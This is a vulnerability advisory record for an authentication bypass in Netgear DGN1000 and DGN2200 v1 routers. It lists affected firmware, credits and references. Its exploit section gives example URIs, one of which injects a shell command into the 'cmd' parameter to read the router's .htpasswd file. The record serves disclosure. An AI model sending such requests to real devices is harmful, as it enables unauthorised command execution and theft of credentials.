ID
VAR-E-201305-0084
TITLE
Multiple Netgear DGN Devices Remote Authentication Bypass Vulnerability
Trust: 0.3
DESCRIPTION
Netgear DGN1000 and DGN2200 devices are prone to a remote authentication-bypass vulnerability.
Remote attackers can exploit this issue to bypass the authentication mechanism and execute commands within the context of affected devices with elevated privileges.
The following versions are vulnerable:
NetGear DGN1000 running firmware prior to version 1.1.00.48
Netgear DGN2200 v1
Trust: 0.3
AFFECTED PRODUCTS
| vendor: | netgear | model: | dgn2200v1 | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | netgear | model: | dgn1000 | scope: | eq | version: | 1.1.00.41 | Trust: 0.3 |
| vendor: | netgear | model: | dgn1000 | scope: | ne | version: | 1.1.00.48 | Trust: 0.3 |
EXPLOIT
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/setup.cgi?currentsetting.htm=1
http://www.example.com/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/www/.htpasswd&curpath=/&currentsetting.htm=1
Trust: 0.3
PRICE
Free
Trust: 0.3
TYPE
Access Validation Error
Trust: 0.3
CREDITS
Roberto Paleari
Trust: 0.3
EXTERNAL IDS
| db: | BID | id: | 60281 | Trust: 0.3 |
REFERENCES
| url: | http://seclists.org/bugtraq/2013/jun/8 | Trust: 0.3 |
| url: | http://www.netgear.com/service-provider/products/routers-and-gateways/dsl-gateways/dgn1000.aspx# | Trust: 0.3 |
| url: | http://www.netgear.com/service-provider/products/routers-and-gateways/dsl-gateways/dgn2200.aspx# | Trust: 0.3 |
SOURCES
| db: | BID | id: | 60281 |
LAST UPDATE DATE
2022-07-27T09:24:48.419000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 60281 | date: | 2013-05-31T00:00:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 60281 | date: | 2013-05-31T00:00:00 |